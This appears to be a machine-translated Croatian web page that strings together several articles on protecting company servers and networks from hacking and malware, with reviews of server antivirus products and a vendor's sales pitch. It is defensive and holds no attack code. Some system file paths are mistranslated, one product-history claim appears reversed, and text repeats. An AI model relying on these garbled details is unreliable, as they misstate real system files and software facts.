Kako bi softverske usluge tvrtke uspješno radile bez kvarova, potrebna vam je kvalitetna instalacija, kao i postavljanje antivirusne zaštite. Danas niti jedna tvrtka ne može bez korištenja interneta za računovodstvo, poslovnu korespondenciju, izvještavanje. CRM sustav je vrlo popularan, ali kvaliteta njegovog rada izravno ovisi o povezanosti s globalnom mrežom.

Prednosti instaliranja virusnog softvera

Antivirusni proizvodi pružaju različite razine zaštite. Programi pomažu spriječiti probleme kao što su:

  • krađa informacija daljinskim pristupom poslužitelju, uključujući povjerljive prirode (na primjer, podaci za pristup računima poduzeća);
  • uvođenje različitih klijentskih aplikacija u operativni sustav za izvođenje DDoS napada;
  • kvar opreme tvrtke zbog štetnog djelovanja raznih programa;
  • blokiranje, oštećenje programa i poslužitelja potrebnih za rad;
  • krađa, krivotvorenje ili uništavanje povjerljivih podataka.

Ukratko, bit će samo jedan zaključak - uvođenje antivirusne baze podataka pomoći će tvrtki da izbjegne velike financijske gubitke. Štoviše, to se ne odnosi samo na sprječavanje mogućeg hakiranja poslužitelja, već i na održavanje funkcionalnosti opreme i plaćenih online sustava. Zato je pitanje postavljanja kvalitetne i učinkovite zaštite uvijek aktualno za poduzeća svih veličina.

Najpopularniji softver za instalaciju u uredu

Korisnici najčešće radije postavljaju različite verzije Kaspersky antivirusa. Popularnost ovog softverskog proizvoda je zbog sljedećih karakteristika:

  • veliki broj opcija za mala, srednja i velika poduzeća, zasebna linija za kućnu upotrebu;
  • Kaspersky programski paketi dizajnirani su za instalaciju ne samo na uredskim poslužiteljima, već i na Mobiteli, prijenosna računala;
  • poslužitelji zajedničkog rada, pošta, razne datoteke pouzdano su zaštićeni antivirusnim proizvodom;
  • Kaspersky Anti-Virus suprotstavlja se napadima na internetske pristupnike;
  • Konfiguracija proizvoda eliminira unutarnju prijetnju od napada na poslužitelj, budući da podrazumijeva diferencijaciju korisničkih prava.

Među ostalim prednostima instaliranja navedenog antivirusnog sustava je sigurnosno kopiranje podataka, pohranjivanje lozinki i automatsko popunjavanje internetskih obrazaca u sigurnom načinu rada, sprječavanje neželjene pošte i krađe identiteta od ulaska na poslužitelje. Osim toga, cijena zaštite ovim proizvodima je vrlo povoljna. Za korisnike koji su malo upućeni u zamršenosti programiranja, programeri Kaspersky Anti-Virus stvorili su prikladno, jednostavno i razumljivo sučelje.

Što tražiti pri odabiru sigurnosnog softvera?

  • za koje poslužitelje je određeni softver dizajniran za zaštitu: kuće, malih i srednjih poduzeća, velikih tvrtki;
  • širina pokrivenosti predloženim programima lokalnih poslovnih poslužitelja;
  • kontinuitet rada, učestalost i uvjeti ažuriranja;
  • mogućnost centraliziranog upravljanja antivirusnim sustavom;
  • kompatibilnost predloženog proizvoda s instaliranim poslovnim programima i drugim softverom.

Važna točka je i izbor tvrtke koja implementira takve proizvode. Kvalificirani djelatnik će u najkraćem mogućem roku uspostaviti pravilan rad i uputiti klijente u korištenje programskih alata u radu sa serverima. Trošak pružanja takvih usluga igra važnu ulogu - u našoj tvrtki to je uvijek vrlo isplativo.

Nemoguće je jednom zauvijek zaštititi poslužitelj od vanjskog pristupa jer se svaki dan otkrivaju nove ranjivosti i pojavljuju se novi načini hakiranja poslužitelja. U ovom ćemo članku govoriti o zaštiti poslužitelja od neovlaštenog pristupa.

Poslužitelji bilo koje tvrtke mogu prije ili kasnije postati meta hakiranja ili napada virusa. Tipično, rezultat takvog napada je gubitak podataka, reputacija ili financijska šteta, tako da se na prvom mjestu treba pozabaviti sigurnosnim problemima poslužitelja.

Treba imati na umu da je zaštita od hakiranja poslužitelja skup mjera, uključujući i one koje podrazumijevaju stalno praćenje rada poslužitelja i rad na poboljšanju zaštite. Nemoguće je jednom zauvijek zaštititi poslužitelj od vanjskog pristupa jer se svaki dan otkrivaju nove ranjivosti i pojavljuju se novi načini hakiranja poslužitelja.

U ovom ćemo članku govoriti o zaštiti poslužitelja od neovlaštenog pristupa.

Načini i metode zaštite poslužitelja od neovlaštenog pristupa Fizička zaštita poslužitelja

Fizička zaštita. Poželjno je da se poslužitelj nalazi u sigurnom podatkovnom centru, zatvorenoj i čuvanoj prostoriji, vanjski ljudi ne smiju imati pristup poslužitelju.

Postavite SSH autentifikaciju

Prilikom postavljanja pristupa poslužitelju koristite autentifikaciju SSH ključem umjesto lozinke, budući da je takve ključeve puno teže, a ponekad i jednostavno nemoguće probiti korištenjem grube pretrage.

Ako smatrate da vam lozinka ipak treba, svakako ograničite broj pokušaja unosa.

Obratite pozornost ako vidite poruku poput ove kada se prijavite:

Posljednja neuspjela prijava: utorak, 28. rujna, 12:42:35 MSK 2017. s 52.15.194.10 na ssh:notty
Bilo je 8243 neuspješnih pokušaja prijave od posljednje uspješne prijave.

To može značiti da je vaš poslužitelj hakiran. U tom slučaju, da biste konfigurirali sigurnost poslužitelja, promijenite SSH port, ograničite popis IP adresa s kojih je moguć pristup poslužitelju ili instalirajte softver koji automatski blokira pretjerano česte i sumnjive aktivnosti.

Redovito instalirajte najnovija ažuriranja

Kako biste osigurali zaštitu poslužitelja, na vrijeme instalirajte najnovije zakrpe i nadogradnje poslužiteljskog softvera koji koristite – operativni sustav, hipervizor, poslužitelj baze podataka.

Preporučljivo je svaki dan provjeravati nove zakrpe, ažuriranja i prijavljene pogreške/ranjivosti kako biste spriječili napade koji iskorištavaju ranjivosti nultog dana. Da biste to učinili, pretplatite se na vijesti tvrtke za razvoj softvera, pratite njezine stranice na društvenim mrežama.

Zaštitite lozinke

Daleko jedan od najčešćih načina za dobivanje pristupa poslužitelju je probijanje lozinke poslužitelja. Stoga slijedite dobro poznate, ali svejedno relevantne preporuke kako ne biste ostavili poslužitelj nezaštićenim:

  • nemojte koristiti lozinke koje je lako pogoditi, poput naziva tvrtke;
  • ako još uvijek koristite zadanu lozinku za administratorsku konzolu, odmah je promijenite;
  • lozinke za različite usluge moraju biti različite;
  • ako morate s nekim podijeliti svoju lozinku, nikada ne šaljite svoju IP adresu, korisničko ime i lozinku u istoj poruci e-pošte ili Messengera;
  • Možete postaviti provjeru autentičnosti u dva koraka za prijavu na administratorski račun.
vatrozid
  • Provjerite ima li poslužitelj , je li konfiguriran i radi li cijelo vrijeme.
  • Zaštitite i dolazni i odlazni promet.
  • Pratite koji su portovi otvoreni i u koju svrhu, ne otvarajte ništa nepotrebno kako biste smanjili broj mogućih ranjivosti za hakiranje poslužitelja.

Konkretno, vatrozid je od velike pomoći u zaštiti poslužitelja od ddos ​​napada, jer možete brzo stvoriti blokirajuća pravila vatrozida i dodati IP adrese s kojih dolazi napad ili blokirati pristup određenim aplikacijama koristeći određene protokole.

Praćenje i otkrivanje upada
  • Ograničite softver i usluge koji se izvode na vašem poslužitelju. Povremeno provjeravajte sve što imate pokrenuto, a ako se pronađu neki nepoznati procesi, odmah ih izbrišite i počnite provjeravati ima li virusa.
  • Povremeno provjerite ima li znakova neovlaštenog otvaranja. Hakiranje može biti dokazano novim korisničkim računima koje niste vi stvorili, premještanjem ili brisanjem datoteke /etc/syslog.conf, izbrisane datoteke /etc/sjena I /etc/passwrd.
  • Pratite svoj poslužitelj, pazite na njegovu normalnu brzinu i propusnost, tako da možete primijetiti odstupanja, na primjer, kada je opterećenje poslužitelja postalo puno više nego inače.
Korištenje VPN-a i SSL/TLS enkripcije

Ako je potreban udaljeni pristup poslužitelju, on mora biti dopušten samo s određenih IP adresa i odvijati se preko VPN-a.

Sljedeći korak u osiguranju sigurnosti može biti postavljanje SSL-a, koji će ne samo šifrirati podatke, već i provjeravati identitet drugih sudionika u mrežnoj infrastrukturi izdavanjem odgovarajućih certifikata.

Sigurnosna provjera poslužitelja

Bilo bi dobro samostalno provjeriti sigurnost poslužitelja pentest metodom, tj. simulaciju napada kako biste pronašli potencijalne ranjivosti i eliminirali ih na vrijeme. Preporučljivo je u to uključiti stručnjake sigurnost informacija, međutim, neki se testovi mogu napraviti neovisno pomoću programa za hakiranje poslužitelja.

Što još prijeti poslužiteljima osim hakiranja

Poslužitelj može pasti iz više razloga osim hakiranja. Na primjer, to može biti infekcija zlonamjernim softverom ili samo fizički kvar jedne od komponenti.

Stoga mjere za zaštitu poslužitelja trebaju uključivati:

  • Instaliranje i ažuriranje programa za zaštitu poslužitelja - antivirusi.
  • Redovite kriptirane kopije podataka barem jednom tjedno, jer su tvrdi diskovi poslužitelja prema statistici na prvom mjestu po učestalosti kvarova. Provjerite je li sigurnosna kopija pohranjena u fizički sigurnom okruženju.
  • Osiguravanje neprekidnog napajanja poslužiteljske sobe.
  • Pravovremena fizička prevencija poslužitelja, uključujući njihovo čišćenje od prašine i zamjenu termalne paste.

Iskustvo Integrusovih stručnjaka nam govori da je najbolja zaštita od ovakvih prijetnji primjena najboljih praksi na području sustava zaštite poslužitelja.

Kako bismo osigurali sigurnost poslužitelja naših klijenata, koristimo kombinaciju alata: vatrozid, antivirus, sigurnosne tehnologije / tehnologije upravljanja događajima (SIM / SEM), tehnologije detekcije / zaštite od upada (IDS / IPS), tehnologije analize ponašanja mreže (NBA) , naravno redovno preventivno održavanje servera i uređenje sigurnih server soba po principu ključ u ruke. To vam omogućuje smanjenje rizika od hakiranja ili kvara poslužitelja iz drugih razloga.

Spremni smo provesti sigurnosnu reviziju poslužitelja vaše tvrtke, konzultirati stručnjake, obaviti sve vrste radova na postavljanju zaštite poslužiteljske opreme.

Poslužitelj je specijalizirano računalo čije se akcije odvijaju bez aktivnog sudjelovanja korisnika. Obično postoji usluga softver za obavljanje određenih zadataka. Putem takvog računala razmjenjuju se podaci, pokreću akcije, izvode se matematički proračuni i još mnogo toga. Svi se poslužitelji razlikuju po vrstama, na primjer, postoje gaming, web, mail i proxy poslužitelji. Svaki takav uređaj obavlja jasno definiranu zadaću. Često se za siguran rad takvog stroja na njega instalira antivirusni program, pa bismo vam htjeli reći nešto više o takvom softveru, ističući nekoliko specifičnih rješenja.

Platforma: Windows Server

Poznata antivirusna tvrtka Avast izdaje sklop posebno za poslužitelje, pružajući dodatne korisne alate. Na primjer, pogledajte funkciju "Uništavanje podataka". Implementiran je na takav način da prepisuje nasumično generirane informacije u svim izbrisanim podacima, što neće dopustiti ponovno stvaranje izvornog stanja datoteke prilikom pokušaja vraćanja. Osim toga, postoji "Analiza ponašanja"- alat odgovoran za skeniranje radnih aplikacija za sumnjive aktivnosti. Ako notepad pokuša pristupiti istoj web kameri, takav će zahtjev odmah biti blokiran. Naravno, takav primjer je jednostavan, ali funkcija radi na višoj razini.

Avast Business Antivirus Pro također ima ugrađeni vatrozid, pametno skeniranje, zaštitu od spama, zaštitu lozinkom i lakšu prijavu na račun. Također postoji stalna usporedba vjerojatnih prijetnji s trenutnom bazom virusa pomoću tehnologije Software defender. Omogućit će vam interakciju samo s provjerenim podacima. Zauzvrat, CyberCapture alat će poslati sumnjive objekte u Threat Lab.

Avira Antivirusni poslužitelj

Platforma: Windows Server

Avira Antivirus Server posebno je rješenje razvojne tvrtke za poslužitelje s operativnim sustavom Windows. Kreatori obećavaju maksimum učinkovit rad s malom potrošnjom sistemskih resursa, visokom stopom otkrivanja prijetnji i jednostavnošću korištenja. Sklop ima dodane alate za zaštitu pri pristupu, odnosno nadzire pokrenute procese kada im pristupaju druge aplikacije. Postoji i ručno skeniranje, koje vam omogućuje da u bilo kojem trenutku pokrenete analizu navedenog medija ili zasebnog direktorija.

Još jednom napominjemo da programer poseban naglasak stavlja na nisku potrošnju resursa računala i jednostavnost upravljanja antivirusom. Također su obećane stalne besplatne inovacije i ažuriranja baze podataka o virusima. Ako ste zainteresirani za upoznavanje s ovim proizvodom, možete dobiti besplatnu verziju u trajanju od 30 dana na službenoj web stranici ispunjavanjem odgovarajućeg obrasca. Tijekom testiranja bit će dostupni svi alati i funkcije, kao i besplatan kontakt sa službom za podršku.

ESET File Security

ESET File Security dizajniran je za rad na Windows i Linux poslužiteljima i pruža višeslojnu zaštitu zahvaljujući dodatnoj komponenti sandboxa oblaka ESET Dynamic Threat Defense. Sustav zaštite temeljen na oblaku automatski štiti od novih prijetnji bez čekanja na ažuriranje mehanizma za otkrivanje (navedeno prosječno vrijeme ažuriranja je 20 minuta). Ugrađena zaštita od mrežnih napada prepoznaje poznate ranjivosti na mrežnoj razini, a kada koristite OneDrive, Office 365 OneDrive Storage engine će to skenirati. Pozornost treba posvetiti i sprječavanju utjecaja botneta. Alat ne samo da pronalazi zlonamjernu vezu, već također otkriva iste procese, odmah blokira opasnu aktivnost i obavještava korisnika o njoj.

Za upravljanje ESET File Security-om, od korisnika se traži da instalira konzolu na Windows ili Linux, a tu je i virtualni uređaj za uvoz koji pojednostavljuje postavljanje. Možete se upoznati sa svim funkcijama ovog antivirusa, isprobati njegovu besplatnu verziju i kupiti punu na službenoj web stranici programera.

kaspersky security

Platforma: Windows Server, Linux

Kaspersky Security for Servers uključen je u sklopove - Total, Endpoint Security for Business, Kaspersky Security for Virtual and Cloud Environments i Kaspersky Security for Storage Systems. Kupnjom jedne od ovih verzija dobivate pouzdanu zaštitu za svoj poslužitelj od najnovija generacija malware. Predmetni softver ima naprednu zaštitu poslužitelja i pruža zaštitu od exploita, zaštitu terminalskih poslužitelja, nadzire vanjski promet, cjelovitost sustava i kontinuirano štiti sustave za pohranu podataka pomoću višerazinskog alata. Ugrađeni sustavi za upravljanje administratorskim pravima omogućuju jednostavnost upravljanja, obavijesti, kao i integraciju sa SIEM sustavima i upravljanje vatrozidom za Windows.

Želio bih napomenuti da Kaspersky Security ima zaseban Zahtjevi sustava za specifične platforme za pohranu, na primjer, za NetApp - Clustered Data ONTAP 8.x i 9.x i Data ONTAP 7.x i 8.x u 7-mod modu, i za EMC Isilon - IBM System Storage N serija. Možete se upoznati s popisom svih zahtjeva prilikom preuzimanja antivirusa na web mjestu Kaspersky.

McAfee VirusScan Enterprise

Platforma: Windows Server, Linux

Prethodno su korisnici instalirali McAfee Endpoint Security na svoje poslužitelje, ali programeri su odlučili poboljšati ovaj proizvod daljnjom promjenom naziva. Sada je to VirusScan Enterprise. Svima koji su već koristili ovaj antivirus nudi se besplatna migracija. Službena web stranica nudi sve potrebne upute i lekcije o ovom pitanju. na osnovni alat nova verzija uključuje: vatrozid, web kontrole za komunikaciju prijetnji, obavezni antivirusni program i mogućnosti sprječavanja iskorištavanja.

McAfee VirusScan Enterprise koristi i modernim metodama strojno učenje. Takve tehnologije omogućuju otkrivanje zlonamjernog koda putem statičkih i bihevioralnih atributa. Malware se zadržava čim uđe u sustav, sprječavajući ga da zarazi druge procese. Tehnologija Endpoint Detection i Tesponse odgovorna je za detekciju krajnje točke i odgovor - to će vam omogućiti da na prijetnje odgovorite jednim klikom.

Comodo Antivirus za Linux

Platforma: Linux

Programeri Comodo Antivirusa predstavili su zasebnu verziju za operativne sustave temeljene na Linux kernelu. Ovaj program podržava većina distribucija, i 32-bitne i 64-bitne.Od značajki, želio bih odmah napomenuti filter pošte, koji je kompatibilan s popularnim agentima pošte: Postfix, Qmail, Sendmail i Exim MTA. Proizvođač jamči pouzdanu zaštitu u stvarnom vremenu, jednostavnost instalacije i bez kompliciranih konfiguracijskih koraka. Sustav protiv neželjene pošte može se u potpunosti urediti ručno, ali to će omogućiti standardne postavke dobra filtracija. Ako korisnik želi dobiti još veću kontrolu nad datotekama, dostupna je funkcija za uključivanje "Analiza ponašanja u stvarnom vremenu". Svi sumnjivi objekti bit će poslani poslužitelju za analizu ponašanja u oblaku.

Za ugodno korištenje Comodo Antivirusa trebat će vam računalo visoke snage s minimalnom frekvencijom procesora od 2 GHz i 2 GB slobodnog RAM-a. Ne morate brinuti o pokretanju skeniranja: bit će dovoljno konfigurirati njihov plan samo jednom, au budućnosti će se pokretati automatski. Analizu je moguće pokrenuti u bilo kojem prikladnom trenutku pritiskom na samo jednu tipku. Dotični antivirus je otvorenog koda, distribuira se besplatno i preuzima se sa službene web stranice.

Chkrootkit

Platforma: Linux

Chkrootkit (Check Rootkit) je program koji administratori sustava široko koriste za zaštitu operativnog sustava od poznatih rootkita. Rootkit je zbirka komponenti, kao što su skripte, izvršne datoteke ili konfiguracijske datoteke, koje obavljaju funkciju maskiranja, kontrole i prikupljanja podataka. Uz pomoć takvih alata, napadači prodiru u OS i dobivaju sve potrebne informacije. Gore spomenuti softver dizajniran je samo za zaštitu računala od ove vrste aktivnosti. Chkrootkit ne zahtijeva instalaciju i može se pokrenuti s Live CD-a. Rad u njemu se provodi putem bilo koje prikladne konzole, a upravljanje je jasno čak i neiskusnom korisniku.

Chkrootkit radi prilično brzo, dobro radi svoj posao, ne zauzima puno prostora na disku, ali u isto vrijeme sadrži ogroman broj modula za svaku vrstu korisnika. Na službenoj web stranici postoje sklopovi programa u raznim proširenjima, a preuzimanje je dostupno s izravnog izvora ili nekoliko zrcala.

Upoznali ste se s antivirusnim rješenjima koja će postati najbolje rješenje Za različite vrste poslužitelji. Kao što vidite, svaki softver ima svoje karakteristike, tako da će biti najkorisniji u određenim situacijama.

Kako pravilno organizirati obranu računalnih mreža od malwarea.

Članak je namijenjen administratorima sustava početnicima.

Pod antivirusnom zaštitom mislim na zaštitu od bilo koje vrste zlonamjernog softvera: virusa, trojanaca, root kitova, backdoora,…

1 Korak antivirusne zaštite - instalirajte antivirusni softver na svako računalo u mreži i ažurirajte ga barem jednom dnevno. Ispravna shema ažuriranje antivirusnih baza podataka: 1-2 poslužitelja idu po ažuriranja i distribuiraju ažuriranja svim računalima u mreži. Obavezno postavite lozinku da biste onemogućili zaštitu.

Antivirusni softver ima mnogo nedostataka. Glavni nedostatak je što ne hvataju viruse napisane po narudžbi i koji nisu u širokoj upotrebi. Druga mana je što opterećuju procesor i zauzimaju memoriju na računalima, neki više (Kaspersky), neki manje (Eset Nod32), o tome se mora voditi računa.

Instalacija antivirusnog softvera obavezan je ali nedovoljan način zaštite od izbijanja virusa, često se potpis virusa pojavljuje u antivirusnim bazama sljedeći dan nakon distribucije, za 1 dan virus može paralizirati rad bilo koje računalne mreže.

Obično se administratori sustava zaustave na koraku 1, što je još gore, ne dovrše ga ili ne prate ažuriranja, a prije ili kasnije do infekcije ipak dođe. U nastavku ću navesti druge važne korake za jačanje antivirusne zaštite.

Korak 2 Politika lozinki. Virusi (trojanci) mogu zaraziti računala na mreži pogađanjem lozinki za standardne račune: root, admin, Administrator, Administrator. Uvijek koristite složene lozinke! Za račune bez lozinki ili s jednostavnim lozinkama treba otpustiti administratora sustava uz odgovarajući upis u radnu knjižicu. Nakon 10 pokušaja unosa netočne lozinke, račun treba blokirati na 5 minuta radi zaštite od grube sile (pogađanje lozinke jednostavnim nabrajanjem). Toplo se preporučuje da se ugrađeni administratorski računi preimenuju i onemoguće. Lozinke je potrebno povremeno mijenjati.

3. korak Ograničenje korisničkih prava. Virus (trojanac) širi se mrežom u ime korisnika koji ga je pokrenuo. Ako su prava korisnika ograničena: nema pristupa drugim računalima, nema administrativnih prava na svom računalu, tada čak ni pokrenuti virus neće moći ništa zaraziti. Nije neuobičajeno da sami administratori sustava postanu krivci za širenje virusa: pokrenuli su admin key-gen i virus je zarazio sva računala na mreži...

Korak 4 Redovita instalacija sigurnosnih ažuriranja. Težak je to posao, ali mora se raditi. Morate ažurirati ne samo OS, već i sve aplikacije: DBMS, poslužitelje pošte.

Korak 5 Ograničenje načina prodiranja virusa. Virusi ulaze u lokalnu mrežu poduzeća na dva načina: putem prijenosnih medija i putem drugih mreža (Internet). Uskraćivanjem pristupa USB-u, CD-DVD-u potpuno blokirate 1 način. Ograničavanjem pristupa internetu blokirate 2. put. Ova metoda je vrlo učinkovita, ali teška za provedbu.

Korak 6 Vatrozidi (ITU), oni su također vatrozidi (firewall), oni su također vatrozidi. Moraju biti instalirani na granicama mreže. Ako je vaše računalo izravno povezano s internetom, ITU mora biti omogućen. Ako je računalo spojeno samo na lokalnu mrežu (LAN) i pristupa Internetu i drugim mrežama putem poslužitelja, tada nije potrebno omogućiti ITU na ovom računalu.

Korak 7 Dijeljenje poslovne mreže na podmreže. Prikladno je razbiti mrežu prema principu: jedan odjel u jednoj podmreži, drugi odjel u drugoj. Podmreže se mogu podijeliti na fizički sloj (SCS), na sloj podatkovne veze (VLAN), na mrežni sloj (podmreže koje nisu presječene IP adresama).

Korak 8 Windows ima prekrasan alat za upravljanje sigurnošću velikih grupa računala - to su grupna pravila (GPO). Putem GPO-a možete konfigurirati računala i poslužitelje tako da infekcija i distribucija zlonamjernog softvera postane gotovo nemoguća.

Korak 9 Pristup terminalu. Podignite 1-2 terminalna servera na mreži preko kojih će korisnici pristupati Internetu i vjerojatnost zaraze njihovih osobnih računala će pasti na nulu.

Korak 10 Praćenje svih procesa i servisa koji se izvode na računalima i poslužiteljima. Možete napraviti tako da kada se pokrene nepoznati proces (usluga), administrator sustava bude obaviješten. Komercijalni softver koji to može puno košta, ali u nekim slučajevima troškovi su opravdani.

Gore